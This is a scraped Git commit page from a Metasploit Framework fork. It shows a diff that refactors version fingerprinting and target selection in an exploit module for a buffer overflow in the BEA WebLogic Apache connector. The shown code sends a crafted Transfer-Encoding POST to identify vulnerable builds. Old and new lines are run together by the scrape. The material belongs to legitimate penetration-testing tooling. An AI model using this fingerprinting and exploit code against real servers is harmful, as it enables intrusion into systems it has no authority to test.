dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

trying to improve bea weblogic connector bof

This commit is contained in:
jvazquez-r7 2012-05-18 01:13:56 +02:00
parent c0d17734ed
commit e7f5bf132c
1 changed files with 54 additions and 54 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

108
modules/exploits/windows/http/bea_weblogic_post_bof.rb
View File

@ -22,12 +22,14 @@ class Metasploit3 < Msf::Exploit::Remote
Weblogic Apache plugin. Weblogic Apache plugin.
The connector fails to properly handle specially crafted HTTP POST The connector fails to properly handle specially crafted HTTP POST
requests, resulting a buffer overflow due to the insecure usage requests resulting in a buffer overflow due to the insecure usage
of sprintf. Currently, this module works over Windows systems without DEP, of sprintf.
and has been tested with Windows 2000 / XP.
In addition, the Weblogic Apache plugin version is fingerprinted with a POST The Weblogic Apache plugin version is fingerprinted with a POST
request containing a specially crafted Transfer-Encoding header. request containing a specially crafted Transfer-Encoding header.
At this moment this module works over Windows systems without DEP
and has been tested with Windows 2000 / XP.
}, },
'Author' => 'Author' =>
[ [
@ -84,50 +86,22 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
my_data = rand_text_alpha(rand(5) + 8) fingerprint = fingerprint_mod_wl
res = send_request_cgi({
'method' => 'POST',
'uri' => target_uri.path,
'headers' =>
{
'Transfer-Encoding' => my_data
},
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
})
if res and res.code == 200
# BEA WebLogic 8.1 SP6 - mod_wl_20.so
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
res.body =~ /Change Number:<\/B> <I>779586/
return Exploit::CheckCode::Vulnerable
end
# BEA WebLogic 8.1 SP5 - mod_wl_20.so
if res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and
res.body =~ /Change Number:<\/B> <I>616810/
return Exploit::CheckCode::Vulnerable
end
# BEA WebLogic 8.1 SP4 - mod_wl_20.so
if res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and
res.body =~ /Change Number:<\/B> <I>452998/
return Exploit::CheckCode::Vulnerable
end
# Check for dates prior to patch release
if res.body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
build_date = Date.parse($1)
if build_date <= Date.parse("Jul 28 2008")
return Exploit::CheckCode::Appears
end
end
case fingerprint
when /Version found/
return Exploit::CheckCode::Vulnerable
when /BEA WebLogic connector vulnerable/
return Exploit::CheckCode::Appears
when /BEA WebLogic connector undefined/
return Exploit::CheckCode::Detected
when /BEA WebLogic connector no vulnerable/, /BEA WebLogic connector not found/
return Exploit::CheckCode::Safe
end end
return Exploit::CheckCode::Safe
end end
def exploit def exploit
@ -159,6 +133,23 @@ class Metasploit3 < Msf::Exploit::Remote
return target if target.name != 'Automatic' return target if target.name != 'Automatic'
fingerprint = fingerprint_mod_wl
case fingerprint
when /BEA WebLogic 8.1 SP6 - mod_wl_20.so/
return targets[1]
when /BEA WebLogic 8.1 SP5 - mod_wl_20.so/
return targets[2]
when /BEA WebLogic 8.1 SP4 - mod_wl_20.so/
return targets[3]
else
return nil
end
end
def fingerprint_mod_wl
my_data = rand_text_alpha(rand(5) + 8) my_data = rand_text_alpha(rand(5) + 8)
res = send_request_cgi( res = send_request_cgi(
{ {
@ -171,22 +162,31 @@ class Metasploit3 < Msf::Exploit::Remote
'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n", 'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",
}) })
if res and res.code == 200 if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/
# BEA WebLogic 8.1 SP6 - mod_wl_20.so # BEA WebLogic 8.1 SP6 - mod_wl_20.so
if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and case res.body
res.body =~ /Change Number:<\/B> <I>779586/ when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/)
return targets[1] return "Version found: BEA WebLogic 8.1 SP6 - mod_wl_20.so"
# BEA WebLogic 8.1 SP5 - mod_wl_20.so # BEA WebLogic 8.1 SP5 - mod_wl_20.so
elsif res.body =~ /Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and when (/Build date\/time:<\/B> <I>Aug 5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/)
res.body =~ /Change Number:<\/B> <I>616810/ return "Version found: BEA WebLogic 8.1 SP5 - mod_wl_20.so"
return targets[2] when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/)
elsif res.body =~ /Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and return "Version found: BEA WebLogic 8.1 SP4 - mod_wl_20.so"
res.body =~ /Change Number:<\/B> <I>452998/ # Check for dates prior to patch release
return targets[3] when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
build_date = Date.parse($1)
if build_date <= Date.parse("Jul 28 2008")
return "BEA WebLogic connector vulnerable"
else
return "BEA WebLogic connector no vulnerable"
end
else
return "BEA WebLogic connector undefined"
end end
end end
return nil return "BEA WebLogic connector not found"
end end
end end